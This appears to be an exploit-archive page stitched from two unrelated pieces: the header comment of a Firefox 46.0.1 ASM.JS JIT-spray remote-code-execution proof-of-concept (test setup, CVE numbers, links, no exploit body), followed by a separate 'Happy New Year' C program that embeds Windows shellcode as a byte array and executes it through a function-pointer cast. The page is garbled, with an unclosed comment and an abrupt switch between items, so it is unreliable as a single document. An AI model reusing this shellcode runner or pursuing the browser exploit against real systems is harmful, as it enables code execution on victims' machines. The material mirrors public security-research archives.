Demo Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution

<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successfull exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 

Reference :
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs

Happy New Year 2018

Shellcode with Chinese characters, win32/64 windows 7

2018


/*

               __
               /\/'-,
       ,--'''''   /"
 ____,'.  )       \___
'"""""------'"""`-----'

Happy New Year -  新年快樂

*/
#include<stdio.h>
#include<string.h>


char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08"
                   "\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c"
                   "\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01"
                   "\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"
                   "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01" 
                   "\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x61\x72\x20\x01\x68\x77\x20\x59"
                   "\x65\x68\x79\x20\x4e\x65\x68\x48\x61\x70\x70\x89\xe1\xfe\x49\x0f"
                   "\x31\xc0\x51\x50\xff\xd7"
                   "\新\年\快\樂\狗\年\行\大\運\好\運\旺\旺\來";  
 
int main()
{
 
printf("shellcode length %ld\n",(unsigned)strlen(shellcode));
(* (int(*)()) shellcode) ();
}